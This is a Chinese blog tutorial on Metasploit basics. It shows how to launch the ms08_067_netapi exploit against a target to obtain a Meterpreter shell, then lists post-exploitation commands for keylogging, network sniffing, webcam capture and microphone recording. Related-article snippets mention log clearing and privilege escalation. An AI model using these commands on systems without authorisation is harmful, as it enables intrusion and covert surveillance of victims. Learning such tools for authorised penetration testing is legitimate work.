Metasploit(三) Meterpreter基础知识

最新推荐文章于 2024-08-09 10:53:56 发布
最新推荐文章于 2024-08-09 10:53:56 发布
阅读量1.6k 收藏 6
点赞数 1
分类专栏: 安全测试 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010680986/article/details/119982756
版权

攻击前期步骤:

1. 启动msfconsole:命令行输入use exploit/windows/smb/ms08_067_netapi

 2. 可以通过show options查看设置的条件,默认远程主机不会有内容,需要手动设置,通过set RHOST ip 进行设置目标主机地址,端口也可以设置,设置完成后,可以看到如下图,上面是目标主机的ip和端口信息,下面是本地信息

3. 设置完毕后,输入exploit就可以进入meterpreter shell

基本命令

输入help可以查看所有Meterpreter命令

 

以下列举一些基本命令使用

进程列表相关命令:getuid(获取系统id和计算机名称)kill(终止进程)ps(列举正在运行中的进程)getpid (获取当前进程标识符)

键盘相关的进程命令:keyscan_start(开启按键记录会话)kyescan_stop(关闭按键记录会话)

keyscan_dump(存储被攻击主机获取到的按键)

会话相关进程命令:enumdesktops( 列举所有可以访问到的桌面)getdesktop(获取当前桌面) setdesktop(变更当前桌面)

嗅探功能的进程命令:use sniffer(家在嗅探功能)  sniffer_start/stop(开启/停止嗅探) sniffer_dump(将捕获的主机数据转存到本地)

摄像头:webcam_list(获取系统中的摄像头列表)  webcam_snap(捕获被攻击主机的快照) record_mic(从主机的麦克风中记录声音)

6321
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1893
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
Kali-linux控制Meterpreter
2301_77162959的博客
05-17 1117
MeterpreterMetasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。
详尽的msf——meterpreter——渗透测试教程
m0_61101264的博客
11-02 428
本文仅供学习参考使用,切勿用于非法事情!!众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。现在发现msf很厉害,可以在它的基础上开发。msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。
meterpreter环境下的命令集
12-13
非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好
Metasploit Framework(3)Meterpreter
ElegantHedgehog的博客
09-09 174
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 Meterpreter:是一种高级的,动态的,可拓展的payload 获取系统Shell通常很有用,但是有时候我们需要更深入的"Shell" 比如我想知道目标机器的键盘什么键被按下,或者使目标机器弹出一个提示框等等 meterpreter获取的不是系统的shell meterpreter是完全基于内存DLL注入式payload(不写硬盘) 因此有...
msfconsole开启meterpreter
a1_pha的博客
02-20 448
meterpreter是msf框架的一个后渗透工具,在靶机上运行了msfvenom使用相应payload生成的木马后,可通过meterpreter对其进行连接。其中lhost,lport为主机ip及端口。
meterpreter使用教程
u011250160的博客
04-26 1665
Core Commands ============= Command Description ------- ----------- ? 在meterpreter下输入?和help是一样的就是显示所有的参数 background background和bg是一样的,后台运行shell,也相当于ctrl+z进入后台运行
后渗透之meterpreter使用攻略
xj28555的博客
08-10 2166
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚
关于Metasploit Framework与渗透测试相关知识
12-28
**一、Metasploit Framework基础** 1. **框架结构**:Metasploit分为几个主要部分,包括数据库、模块、payloads(Payloads)和exploits(Exploits)。模块库包含了各种预编写好的攻击代码,payloads是利用漏洞后...
玩转Metasploit初级系列课程
08-15
Metasploit社区不断推出新的漏洞利用模块和功能,因此,定期关注Metasploit Framework的更新和社区动态,是保持知识最新状态的关键。 在“玩转Metasploit初级系列课程”中,你将逐步掌握这个工具的精髓,从基础操作...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
Metasploit渗透测试指南.修订版
09-12
1. **Metasploit基础**:介绍如何安装和配置Metasploit环境,包括基本的命令行操作和工作流程,如加载模块、设置选项和执行攻击。 2. **漏洞利用(Exploits)**:详细解释了exploit的工作原理,以及如何在...
Meterpreter基础命令
公众号shadow sock7
05-25 2299
helpbackground把已打开的session放到后台cat输出文件文件内容cd && pwdclearev清除Windows上的应用日志,系统日志,和安全日志Demometerpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8652
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5698
meterpreter使用攻略(持续更新中)
2、(权限提升)进入Meterpreter后的攻击方式小结
daxi0ng的博客
03-15 1565
##使用getsystem提权失败的话,可以使用WMIC工具进行提权准备,使用提权模块进行提权,如MS16-032,本次进入的就是system权限。 令牌窃取 令牌简介及原理 令牌 (Token) 就是系统的临时密钥, 相当于账户名和密码, 用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。 它允许你在不提供密码或其他凭证的前提下, 访问网络和系统资源。 这些令牌将持续存在于系统中, 除...
系统控制和管理接口:在Linux中利用电源和性能域进行平台资源抽象
最新发布
csdnsqst0046的博客
08-09 877
在本文中,您可以了解到如何利用我们的方法将复杂性从Linux驱动程序(需要为每个平台编写不同的开发程序)转移到固件。由于固件已经适配了平台,因此固件知道需要采取哪些手段来配置外设。您可以了解我们如何定义逻辑性能和电源域,而不是单独处理每个平台资源。您还可以了解到我们如何努力实现这一目标,以及您如何进行尝试并做出贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值